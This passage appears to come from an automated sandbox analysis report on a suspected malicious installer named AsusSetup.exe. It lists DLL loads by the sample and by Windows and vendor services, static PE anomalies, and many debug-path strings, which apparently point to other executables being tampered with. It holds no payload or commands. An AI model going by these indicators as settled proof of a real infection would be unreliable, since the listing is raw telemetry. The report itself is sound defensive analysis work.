Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: drprov.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ntlanman.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: davclnt.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: davhlpr.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: browcli.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32Jump to behavior
Source: AsusSetup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: AsusSetup.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: AsusSetup.exeStatic file information: File size 5251072 > 1048576
Source: AsusSetup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x203c00
Source: AsusSetup.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x18d000
Source: AsusSetup.exeStatic PE information: More than 200 imports for USER32.dll
Source: AsusSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000002.00000003.2102454337.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: AsusSetup.exe, 00000000.00000003.1693327541.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000002.00000003.2157726829.0000000001560000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2172626726.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2160809118.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000002.00000003.1800031110.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000002.00000003.1934452647.0000000001650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000002.00000003.1934452647.0000000001650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000002.00000003.1945933565.0000000001650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000002.00000003.2216381785.0000000001610000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2212707992.0000000001610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: AsusSetup.exe, 00000000.00000003.1725048803.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1742417137.00000000016D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: pack200.exe.2.dr
Source: Binary string: D:\GitSourceCode\AsTaskSched\Release\AsTaskSched.pdb source: AsusSetup.exe
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000002.00000003.1834641811.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: F:\SourceCodeTB\SCD_AutoRunSource\AsusSetup\x64\Release\AsusSetup.pdb source: AsusSetup.exe
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000002.00000003.2095082836.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, MSRMSPIBroker.exe.2.dr
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000002.00000003.2196621773.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb source: msedge_proxy.exe.2.dr
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000002.00000003.2109815107.0000000001620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2121918749.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000002.00000003.1979810912.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000002.00000003.1805970736.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\GitSourceCode\AsTaskSched\x64\Release\AsTaskSched.pdb source: AsusSetup.exe
Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP source: msedge_proxy.exe.2.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: AsusSetup.exe, 00000000.00000003.1714945382.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000002.00000003.1945933565.0000000001650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb source: AdobeARMHelper.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000002.00000003.1815895137.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000002.00000003.1805970736.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdb source: private_browsing.exe.2.dr
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000002.00000003.2157726829.0000000001560000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2172626726.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2160809118.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000002.00000003.1834641811.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000002.00000003.2000319019.0000000001470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000002.00000003.1800031110.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: alg.exe, 00000002.00000003.2216381785.0000000001610000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2212707992.0000000001610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000002.00000003.1747144791.00000000016D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.2080481353.0000000001490000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000002.00000003.2196621773.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb source: alg.exe, 00000002.00000003.1957415043.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000002.00000003.2057462608.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000002.00000003.1979810912.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000002.00000003.2102454337.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000002.00000003.2000319019.0000000001470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000002.00000003.2065372565.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdbp source: private_browsing.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000002.00000003.2095082836.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, MSRMSPIBroker.exe.2.dr
Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000002.00000003.1747144791.00000000016D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000002.00000003.2109815107.0000000001620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2121918749.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdbr source: AdobeARMHelper.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000002.00000003.2008264771.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: AsusSetup.exe, 00000000.00000003.1698531117.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: minidump-analyzer.pdb source: minidump-analyzer.exe.2.dr
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: pack200.exe.2.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: AsusSetup.exe, 00000000.00000003.1714945382.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe_x64.pdb source: Aut2exe_x64.exe.2.dr
Source: Binary string: ALG.pdbGCTL source: AsusSetup.exe, 00000000.00000003.1698531117.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: AsusSetup.exe, 00000000.00000003.1725048803.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1742417137.00000000016D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000002.00000003.1815895137.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb22 source: alg.exe, 00000002.00000003.1957415043.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.2.dr
